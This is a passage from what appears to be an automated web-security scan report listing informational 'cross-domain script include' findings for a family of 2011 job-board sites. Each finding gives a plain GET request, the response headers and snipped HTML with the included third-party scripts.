<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.400. http://www.preferredresumes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.preferredresumes.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.preferredresumes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:29 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tig2sucmmp7tj371vs9tftefe3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83027

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   <title>Resume Writing Services, Professional Resume Writing, Cover Letter Writing
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.401. http://www.procurementcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.procurementcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.procurementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mr66qa0ivqt5goom135g89nlu2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101019

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.402. http://www.productmanagercrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.productmanagercrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.productmanagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:48 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=l5s6qlvjn27hh7eesjabq2c214; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106086

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.403. http://www.projectmanagementcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.projectmanagementcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.projectmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k77p330j68s603hksj5he5k7t6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119200

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.404. http://www.publicinterestcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.publicinterestcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.publicinterestcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d0md3kboqphlouu186urplhea4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104328

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.405. http://www.publishingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.publishingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.publishingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hjafrla8sm0vjpuuvbsqohvh76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114373

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.406. http://www.purchasingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purchasingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.purchasingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jp7jhr7hfsn4u1q0tf9pujn7l0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105391

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.407. http://www.qaqccrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qaqccrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.qaqccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:53 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2cvnjstpd6ib3smaikg60ai1v0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120361

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.408. http://www.radiocrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radiocrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.radiocrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=beoah5h5h42a821e8g7r1l0ko5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113112

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.409. http://www.realestateandlandcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realestateandlandcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.realestateandlandcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:57 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=om23b647f73v2jeihjo6qjanv4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133093

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
